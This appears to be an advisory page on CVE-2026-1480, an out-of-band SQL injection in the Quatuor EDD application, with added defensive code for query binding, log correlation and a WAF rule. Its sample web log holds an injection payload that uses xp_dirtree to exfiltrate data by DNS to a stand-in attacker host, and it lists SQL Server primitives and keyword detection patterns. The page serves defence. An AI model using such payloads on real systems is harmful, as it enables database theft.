CVE-2026-1480 Overview
CVE-2026-1480 is an out-of-band SQL injection (OOB SQLi) vulnerability in the Performance Evaluation (EDD) application developed by Gabinete Técnico de Programación (Quatuor). The flaw is in the Id_usuario parameter of the /evaluacion_objetivos_anyo_sig_evalua.aspx endpoint. An unauthenticated attacker can inject SQL that makes the database server itself send the extracted data over an external channel, such as a DNS lookup or an HTTP request to attacker-controlled infrastructure, so the attacker never needs to see query results in the application's own response. The Spanish national CERT (INCIBE) published the security advisory that tracks this issue.
Critical Impact
Remote, unauthenticated attackers can exfiltrate sensitive database contents from the EDD application over out-of-band channels, compromising the confidentiality of stored evaluation data.
Affected Products
- Quatuor Evaluacion de Desempeno (EDD)
- Performance Evaluation application by Gabinete Técnico de Programación
- Endpoint: /evaluacion_objetivos_anyo_sig_evalua.aspx
Discovery Timeline
- 2026-01-27 - CVE-2026-1480 published to NVD
- 2026-02-10 - Last updated in NVD database
Technical Details for CVE-2026-1480
Vulnerability Analysis
The vulnerability is classified under [CWE-89] Improper Neutralization of Special Elements used in an SQL Command. The Id_usuario request parameter is concatenated into a SQL statement without parameterization or input validation. Because the vulnerable page does not render query results or database errors to the requester, in-band techniques (UNION-based or error-based extraction) are not viable here. Instead, attackers use out-of-band techniques that force the database server to initiate an external network request whose destination name or path carries the extracted data.
OOB SQLi is particularly effective against applications that suppress error messages and do not render query results, because the exfiltration channel is independent of the HTTP response. The attack is network-based, requires no authentication and needs no user interaction, all of which weigh on the severity assessment. It does depend on the database server being able to resolve external names or reach external hosts. The published record does not name the database engine; an ASP.NET application of this kind is usually backed by Microsoft SQL Server, whose extended stored procedures are the usual OOB primitive, and the monitoring guidance below assumes that.
Root Cause
The root cause is the construction of dynamic SQL queries using untrusted input from the Id_usuario parameter. The application fails to enforce strict type checking or use parameterized queries (prepared statements). Any string supplied in this parameter becomes part of the executed SQL command, enabling attacker-controlled query manipulation.
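The following is an added example, not code from the EDD application or its vendor: it shows the root-cause pattern (the request parameter spliced into the SQL text) next to the two layers of the fix, strict type validation and parameter binding, run against an in-memory SQLite database with constructed rows. The table and column names are assumptions for illustration; the real schema is not published. The production fix in an ASP.NET page would use SqlParameter rather than Python's sqlite3, but the mechanism is identical.

```python
"""Added example (not from the EDD application): CWE-89 root cause beside its fix.
Schema, rows and the payload are constructed for illustration."""
import re
import sqlite3

# What a legitimate Id_usuario is assumed to look like: a plain decimal integer.
STRICT_ID = re.compile(r"0|[1-9][0-9]{0,9}")
# A numeric parameter needs no quote to break out: the predicate becomes 7 OR 1=1.
PAYLOAD = "7 OR 1=1"


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the evaluation records."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE evaluacion (id_usuario INTEGER, objetivo TEXT, nota REAL)")
    con.executemany(
        "INSERT INTO evaluacion VALUES (?, ?, ?)",
        [(7, "Ventas Q1", 8.5), (8, "Soporte", 6.0), (9, "Calidad", 9.1)],
    )
    return con


def lookup_vulnerable(con: sqlite3.Connection, id_usuario: str):
    """Root cause: untrusted input is concatenated into the SQL statement."""
    sql = "SELECT id_usuario, objetivo FROM evaluacion WHERE id_usuario = " + id_usuario
    return con.execute(sql).fetchall()


def validate_id_usuario(value: str) -> int:
    """Strict type and length check: anything but a canonical integer is rejected."""
    if not STRICT_ID.fullmatch(value):
        raise ValueError(f"rejected Id_usuario: {value!r}")
    return int(value)


def lookup_bound_only(con: sqlite3.Connection, id_usuario: str):
    """Parameter binding alone: the whole string becomes one operand, never SQL text,
    so "7 OR 1=1" is compared as a value and matches nothing."""
    return con.execute(
        "SELECT id_usuario, objetivo FROM evaluacion WHERE id_usuario = ?", (id_usuario,)
    ).fetchall()


def lookup_hardened(con: sqlite3.Connection, id_usuario: str):
    """Validate first, then bind: the value can only ever be a single integer."""
    uid = validate_id_usuario(id_usuario)
    return con.execute(
        "SELECT id_usuario, objetivo FROM evaluacion WHERE id_usuario = ?", (uid,)
    ).fetchall()


def demo() -> dict:
    """Row counts for each variant, benign and attacked."""
    con = make_db()
    result = {
        "vulnerable_benign": len(lookup_vulnerable(con, "7")),
        "vulnerable_attacked": len(lookup_vulnerable(con, PAYLOAD)),
        "bound_only_attacked": len(lookup_bound_only(con, PAYLOAD)),
        "hardened_benign": len(lookup_hardened(con, "7")),
    }
    try:
        lookup_hardened(con, PAYLOAD)
        result["hardened_rejects_payload"] = False
    except ValueError:
        result["hardened_rejects_payload"] = True
    return result


if __name__ == "__main__":
    print(demo())
```

The vulnerable lookup returns every row for the attacked input because the attacker controls the WHERE clause; the bound-only variant returns nothing because the payload is compared as data; the hardened variant refuses the input before it reaches the database at all, which is the behaviour the WAF and input-validation workarounds later on this page aim to reproduce.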
Attack Vector
An attacker sends a crafted HTTP request to /evaluacion_objetivos_anyo_sig_evalua.aspx with a malicious payload in Id_usuario. The payload typically invokes database functions that perform DNS lookups or HTTP requests to attacker-controlled infrastructure. Query results are encoded, usually as hex, into subdomain labels or URL paths, and are then read from the DNS or HTTP server logs the attacker controls. Because DNS limits a label to 63 characters and a full name to 253, larger results have to be chunked across several queries, which is itself a recognisable pattern in resolver logs. Refer to the INCIBE Security Notice: SQL Injection for additional technical context.
Detection Methods for CVE-2026-1480
Indicators of Compromise
- Unusual DNS queries originating from the database server for unrecognised external domains, often with long encoded or hex-like subdomain labels; these are most visible at the organisation's own recursive resolver, since that is where the database host sends them first
- HTTP requests to /evaluacion_objetivos_anyo_sig_evalua.aspx containing SQL syntax, single quotes, or function calls in the Id_usuario parameter
- Database process activity initiating network connections outside expected application traffic patterns
Detection Strategies
- Inspect web server access logs for anomalous values, encoded payloads, or SQL keywords in the Id_usuario parameter
- Deploy a web application firewall (WAF) with rules tuned to detect SQL injection signatures targeting ASP.NET endpoints
- Monitor database server egress traffic: apart from configured replication, linked-server, backup and update destinations, a database engine has little reason to initiate outbound DNS lookups or HTTP connections, so anything outside that allow-list is suspect
Monitoring Recommendations
- If the backend is Microsoft SQL Server (assumed here from the ASP.NET stack; the record does not name the engine), enable audit logging for execution of xp_dirtree, xp_fileexist, xp_subdirs and xp_cmdshell, and for OPENROWSET or BULK operations that reference UNC paths, since these are the usual primitives for forcing the server to make an outbound request
- Correlate web request logs with DNS query telemetry to identify exfiltration patterns
- Alert on any request to the affected endpoint that contains URL-encoded SQL metacharacters
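As an added example that is not part of the INCIBE notice or any vendor material, the detection and correlation logic described above, run over constructed web-server and DNS query log lines. The log line formats, the IP addresses, the database server address and the domain names are assumptions made for illustration, not captured data; adapt the parsers to the real IIS and resolver log formats.

```python
"""Added example (not from INCIBE or the vendor): scan web logs for a bad Id_usuario,
scan DNS logs for hex-encoded labels, and correlate the two within a time window.
Log formats, addresses and names below are constructed for illustration."""
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qs

ENDPOINT = "/evaluacion_objetivos_anyo_sig_evalua.aspx"
DB_SERVER_IP = "10.0.0.20"  # assumed address of the database host
STRICT_ID = re.compile(r"0|[1-9][0-9]{0,9}")  # legitimate Id_usuario: a plain integer
SQL_HINT = re.compile(
    r"['\";()]|--|/\*|\b(?:select|union|exec|xp_\w+|declare|waitfor|openrowset)\b", re.I
)
HEX_LABEL = re.compile(r"[0-9a-f]{16,63}", re.I)  # long hex-only label: likely encoded data

# Constructed sample lines; format: date time client_ip method uri_stem uri_query status
WEB_LOG = """\
2026-02-11 10:14:58 203.0.113.7 GET /evaluacion_objetivos_anyo_sig_evalua.aspx Id_usuario=7 200
2026-02-11 10:15:02 203.0.113.9 GET /evaluacion_objetivos_anyo_sig_evalua.aspx Id_usuario=7%27%3BEXEC+master..xp_dirtree+%27%5C%5C4544445f757365725f37.oob.attacker.example%5Cx%27-- 200
2026-02-11 10:16:40 203.0.113.7 GET /login.aspx user=ana 200
"""
# Constructed sample lines; format: date time client_ip qname qtype
DNS_LOG = """\
2026-02-11 10:15:00 10.0.0.20 sqlbackup.corp.example A
2026-02-11 10:15:03 10.0.0.20 4544445f757365725f37.oob.attacker.example A
2026-02-11 10:15:30 10.0.0.31 www.microsoft.com A
"""


def parse_web(line: str) -> dict:
    date, time, ip, method, stem, query, status = line.split()
    # parse_qs percent-decodes values; keys are lower-cased because ASP.NET treats
    # query-string names case-insensitively, so id_usuario= must be checked too.
    params = {k.lower(): v for k, v in parse_qs(query, keep_blank_values=True).items()}
    return {"ts": datetime.fromisoformat(f"{date} {time}"), "ip": ip,
            "stem": stem.lower(), "params": params, "status": status}


def flag_web(event: dict):
    """Reason string if the request hits the endpoint with a non-integer Id_usuario, else None."""
    if event["stem"] != ENDPOINT:
        return None
    for value in event["params"].get("id_usuario", []):  # every occurrence: parameter pollution
        if not STRICT_ID.fullmatch(value):
            hits = sorted({m.group(0).lower() for m in SQL_HINT.finditer(value)})
            return f"Id_usuario fails strict pattern; SQL hints: {', '.join(hits) or 'none'}: {value[:60]}"
    return None


def parse_dns(line: str) -> dict:
    date, time, ip, qname, qtype = line.split()
    return {"ts": datetime.fromisoformat(f"{date} {time}"), "ip": ip,
            "qname": qname.rstrip("."), "qtype": qtype}


def decode_hex_labels(qname: str) -> list:
    """Decode every label that looks like hex-encoded data (the usual OOB encoding)."""
    out = []
    for label in qname.split("."):
        if HEX_LABEL.fullmatch(label) and len(label) % 2 == 0:
            out.append(bytes.fromhex(label).decode("utf-8", "replace"))
    return out


def correlate(web_lines: str, dns_lines: str, window: timedelta = timedelta(seconds=120)) -> list:
    """Alerts for flagged web requests, with any database-server DNS exfil in the window."""
    web = [parse_web(l) for l in web_lines.splitlines() if l.strip()]
    dns = [parse_dns(l) for l in dns_lines.splitlines() if l.strip()]
    alerts = []
    for w in web:
        reason = flag_web(w)
        if reason is None:
            continue
        exfil = [(d["qname"], decode_hex_labels(d["qname"])) for d in dns
                 if d["ip"] == DB_SERVER_IP and w["ts"] <= d["ts"] <= w["ts"] + window
                 and decode_hex_labels(d["qname"])]
        alerts.append({"ts": w["ts"].isoformat(sep=" "), "src": w["ip"],
                       "reason": reason, "exfil": exfil})
    return alerts


if __name__ == "__main__":
    for alert in correlate(WEB_LOG, DNS_LOG):
        print(alert)
```

The web-side check deliberately keys on the parameter failing the strict integer pattern rather than on a keyword list, so obfuscated payloads are still flagged; the SQL hints are only there to enrich the alert. The DNS side decodes the hex label so the analyst sees what left the database, and the correlation anchors each alert on the web request so the external source address survives into the incident record. Base32 or base64 encodings would need an additional label pattern.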
How to Mitigate CVE-2026-1480
Immediate Actions Required
- Contact Quatuor / Gabinete Técnico de Programación to confirm patch availability for the EDD application
- Restrict network access to the /evaluacion_objetivos_anyo_sig_evalua.aspx endpoint to trusted internal users while remediation is pending
- Block outbound DNS and HTTP traffic from the database server to the internet at the perimeter firewall; note that DNS exfiltration normally travels through the organisation's own recursive resolver, which then forwards the lookup on the database server's behalf, so also deny or log external name resolution for the database host at the resolver itself
- Review database audit logs for evidence of prior exploitation attempts
Patch Information
At the time of publication, no vendor patch URL is listed in the NVD record. Organizations should consult the INCIBE Security Notice: SQL Injection and contact the vendor directly for remediation guidance.
Workarounds
- Deploy a WAF rule that rejects requests where Id_usuario contains non-numeric characters or SQL metacharacters, after confirming from legitimate traffic that the parameter is always a plain integer
- Apply egress filtering on database servers to block unsolicited outbound DNS and HTTP traffic, including at the internal resolver, which neutralises OOB exfiltration
- Implement application-layer input validation that enforces strict type and length constraints on the Id_usuario parameter
- Refactor affected queries to use parameterized statements once vendor permits or source access is available
# Example WAF rule (ModSecurity v2 syntax) rejecting any Id_usuario that is not a plain decimal integer.
# The numeric-only assumption must be confirmed against legitimate traffic before deployment.
# ARGS:Id_usuario is evaluated against every occurrence of the parameter, so a duplicated
# parameter cannot smuggle a second value past the check; t:none disables inherited transformations.
SecRule ARGS:Id_usuario "!@rx ^[0-9]{1,10}$" \
    "id:1026148,phase:2,t:none,log,deny,status:403,\
    msg:'CVE-2026-1480 - Invalid Id_usuario parameter',\
    logdata:'Matched value: %{MATCHED_VAR}'"
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

